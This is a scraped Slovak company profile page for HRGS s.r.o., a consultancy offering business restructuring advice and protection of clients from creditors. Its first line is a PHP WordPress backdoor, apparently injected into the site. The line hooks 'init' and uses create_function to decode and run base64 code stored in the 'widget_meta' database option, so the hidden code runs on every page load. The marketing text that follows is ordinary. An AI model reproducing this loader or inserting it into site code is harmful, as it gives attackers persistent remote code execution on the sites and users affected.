add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); HRGS s.r.o. | The best or nothing. The best or nothing.

Profil spoločnosti

HRGS s.r.o.

Zoznam našich klientov obsahuje spoločnosti podnikajúce na lokálnej, národnej ako aj nadnárodnej úrovni. Všetky spoločnosti, s ktorými spolupracujeme, dosahujú nadštandardné výsledky aj vďaka službám poskytovaným spoločnosťou HRGS s.r.o..

HRGS s.r.o. združuje expertov so skúsenosťami predovšetkým v oblasti ekonomického, právneho a obchodného poradenstva so zameraním na optimalizáciu podnikateľských činností. V ostatných rokoch výrazne stúpla potreba dočasnej ochrany klienta pred jeho veriteľmi, resp. pred individuálnym vymáhaním pohľadávok na preklenutie aktuálnej nepriaznivej situácie.

Po roku 2008, s príchodom krízy, sa situácia aj v najstabilnejších spoločnostiach zhoršila a bolo potrebné prijať racionalizačné opatrenia s cieľom zníženia záväzkov, zrýchlenia obratu pohľadávok a zefektívnenia vnútorných procesov.

Uvedené problémy sme v úzkej spolupráci s našimi klientmi úspešne vyriešili a klienti vyšli z problémovej situácie, mnohokrát aj vďaka vstupu strategického investora, silnejší. Myslíme si, že naši spokojní klienti sú vizitkou svedčiacou o kvalite našich služieb a veríme, že spolupráca prinesie aj Vašej spoločnosti podobné výsledky.

Scroll to Top
Prejsť na panel nástrojov